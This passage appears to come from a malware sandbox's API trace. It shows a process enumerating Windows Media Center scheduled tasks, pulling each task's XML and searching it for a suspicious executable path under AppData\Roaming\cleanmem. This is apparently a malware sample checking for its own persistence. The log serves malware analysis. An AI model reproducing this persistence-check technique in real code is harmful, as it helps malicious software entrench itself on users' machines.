D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -MediaCenterRecoveryTask\r\n \r\n \r\n {23E5D772-327A-42f5-BDEE-C65C6796BB2A}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.992] IUnknown:Release (This=0x127090) returned 0x0 [0137.992] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.992] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="ObjectStoreRecoveryTask") returned 0x0 [0137.992] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-131)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-132)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -ObjectStoreRecoveryTask\r\n \r\n \r\n {177AFECE-9599-46cf-90D7-68EC9EEB27B4}\r\n \r\n \r\n \r\n") returned 0x0 [0137.994] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-131)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-132)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -ObjectStoreRecoveryTask\r\n \r\n \r\n {177AFECE-9599-46cf-90D7-68EC9EEB27B4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.995] IUnknown:Release (This=0x127090) returned 0x0 [0137.995] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.995] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="OCURActivate") returned 0x0 [0137.995] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURActivate\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURActivate\r\n \r\n \r\n") returned 0x0 [0137.997] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURActivate\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURActivate\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.997] IUnknown:Release (This=0x127090) returned 0x0 [0137.997] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.997] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="OCURDiscovery") returned 0x0 [0137.997] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURDiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURDiscovery $(Arg0)\r\n \r\n \r\n") returned 0x0 [0137.999] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURDiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURDiscovery $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.999] IUnknown:Release (This=0x127090) returned 0x0 [0137.999] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.999] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="PBDADiscovery") returned 0x0 [0137.999] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0138.002] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.002] IUnknown:Release (This=0x127090) returned 0x0 [0138.002] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.002] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="PBDADiscoveryW1") returned 0x0 [0138.002] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW1\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:7 /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0138.004] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW1\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:7 /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.004] IUnknown:Release (This=0x127090) returned 0x0 [0138.004] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.004] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="PBDADiscoveryW2") returned 0x0 [0138.004] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW2\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:90 /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0138.007] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW2\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:90 /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.007] IUnknown:Release (This=0x127090) returned 0x0 [0138.007] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.007] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="PeriodicScanRetry") returned 0x0 [0138.007] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-104)\r\n 2008-07-06T05:40:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-103)\r\n \\Microsoft\\Windows\\Media Center\\PeriodicScanRetry\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n 2006-09-09T17:33:00\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n \r\n \r\n \r\n %windir%\\ehome\\MCUpdate.exe\r\n -pscn 0\r\n \r\n \r\n") returned 0x0 [0138.010] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-104)\r\n 2008-07-06T05:40:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-103)\r\n \\Microsoft\\Windows\\Media Center\\PeriodicScanRetry\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n 2006-09-09T17:33:00\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n \r\n \r\n \r\n %windir%\\ehome\\MCUpdate.exe\r\n -pscn 0\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.010] IUnknown:Release (This=0x127090) returned 0x0 [0138.010] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.010] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="PvrRecoveryTask") returned 0x0 [0138.010] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-129)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-130)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrRecoveryTask\r\n \r\n \r\n {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}\r\n \r\n \r\n \r\n") returned 0x0 [0138.013] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-129)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-130)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrRecoveryTask\r\n \r\n \r\n {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.013] IUnknown:Release (This=0x127090) returned 0x0 [0138.013] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.013] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="PvrScheduleTask") returned 0x0 [0138.013] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrScheduleTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-135)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-136)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrSchedule\r\n \r\n \r\n {CEF51277-5358-477b-858C-4E14F0C80BF7}\r\n \r\n \r\n \r\n") returned 0x0 [0138.015] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrScheduleTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-135)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-136)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrSchedule\r\n \r\n \r\n {CEF51277-5358-477b-858C-4E14F0C80BF7}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.015] IUnknown:Release (This=0x127090) returned 0x0 [0138.015] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.015] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="RecordingRestart") returned 0x0 [0138.015] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RecordingRestart\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-127)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-128)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n false\r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehrec\r\n /RestartRecording\r\n \r\n \r\n") returned 0x0 [0138.017] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RecordingRestart\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-127)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-128)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n false\r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehrec\r\n /RestartRecording\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.018] IUnknown:Release (This=0x127090) returned 0x0 [0138.018] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.018] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="RegisterSearch") returned 0x0 [0138.018] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RegisterSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRegisterSearch $(Arg0)\r\n \r\n \r\n") returned 0x0 [0138.020] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RegisterSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRegisterSearch $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.021] IUnknown:Release (This=0x127090) returned 0x0 [0138.021] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.021] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="ReindexSearchRoot") returned 0x0 [0138.021] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ReindexSearchRoot\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoReindexSearchRoot\r\n \r\n \r\n") returned 0x0 [0138.024] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ReindexSearchRoot\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoReindexSearchRoot\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.024] IUnknown:Release (This=0x127090) returned 0x0 [0138.024] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.024] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="SqlLiteRecoveryTask") returned 0x0 [0138.024] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-133)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-134)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -SqlLiteRecoveryTask\r\n \r\n \r\n {59116E30-02BD-4b84-BA1E-5D77E809B1A2}\r\n \r\n \r\n \r\n") returned 0x0 [0138.026] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-133)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-134)\r\n 